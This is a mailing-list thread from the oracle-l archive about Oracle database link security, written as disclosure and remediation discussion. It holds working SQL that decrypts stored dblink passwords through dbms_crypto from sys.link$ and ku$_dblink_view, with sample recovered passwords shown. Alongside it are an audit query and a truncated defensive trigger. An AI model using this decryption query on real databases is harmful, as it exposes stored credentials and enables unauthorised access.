Re: Database Link Security et al

• From: <oracle@xxxxxxxxxxxxx>
• To: oracle-l@xxxxxxxxxxxxx
• Date: Wed, 28 Nov 2012 17:18:34 +0000 (GMT)

Hi ****

Your question below is a good one, as I have had a number of other direct
offline emails about the same topic since my original posting, which I
will answer here in one go.

The solution proposed of restricting access to sys.link$ is the well
known remediation - but it does not solve this issue unfortunately, as
you will see below the dblink ciphertexts are selectable through
ku$_dblink_view as well, hence the wider visibility of the link
passwords.

SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view;

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWD
--------------------------------------------------------------------------------
TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

(11.2.0.1)

I will be presenting additional new research, exclusive to UKOUG, on
Monday.

Cheers,
Paul
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62


On 11/27/2012, "********" <*********@*****.com> wrote:

>Hi Paul
>Could you share the paper if that is ok.
>I am interested in the automated solution for the db link security issue.
>ONe thing is basically restrict access to link$.
>
>Thank you
>****
>
>
>
>On Sun, Nov 25, 2012 at 12:18 PM, <oracle@xxxxxxxxxxxxx> wrote:
>
>>
>> So, users can decrypt dblink passwords as the key is included in the
>> ciphertext... -->
>>
>> SQL> select name, userid,
>> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
>> 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';
>>
>> NAME
>>
>> --------------------------------------------------------------------------------
>> USERID
>> ------------------------------
>> PASSWORD
>>
>> --------------------------------------------------------------------------------
>> TEST_LINK
>> DBLINK_ACCOUNT
>> MYPW
>>
>> ..one saving grace is that we can now identify incoming db links using
>> this..
>>
>> select userid, terminal, comment$text from sys.aud$ where comment$text
>> like 'DBLINK%';
>> USERID         NTIMESTAMP#          USERHOST  COMMENT$TEXT
>> ------------  -----------------     -------   --------------
>> DBLINK_ACCOUNT  19-NOV-12 01.42.16.305194000    orlin   DBLINK_INFO:
>> (SOURCE_GLOBAL_NAME=orcl.4294967295)
>>
>> -->could be too late though so best to take a few precautions in
>> advance... preferably automated...
>>
>> ..Same with lack of profiles on SYS account. Sometimes easier to fix
>> ourselves..
>>
>> create or replace trigger sys_throttler.tra_servererror_ora1017
>> after servererror on database
>> declare
>>    l_db_usr varchar2 (32);
--
//www.freelists.org/webpage/oracle-l

• Follow-Ups:
  • RE: Database Link Security et al
    • From: Powell, Mark

Other related posts:

• » Database Link Security et al- oracle
• » Re: Database Link Security et al - oracle
• » RE: Database Link Security et al- Powell, Mark
• » Re: Database Link Security et al- rjamya
• » RE: Database Link Security et al- Powell, Mark
• » RE: Database Link Security et al- Sweetser, Joe
• » RE: Database Link Security et al- D'Hooge Freek
• » RE: Database Link Security et al- oracle
• » RE: Database Link Security et al- Patterson, Joel
• » RE: Database Link Security et al- Jeff Chirco
• » RE: Database Link Security et al- oracle

1. Home
2. oracle-l
3. Archive
4. 11-2012

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---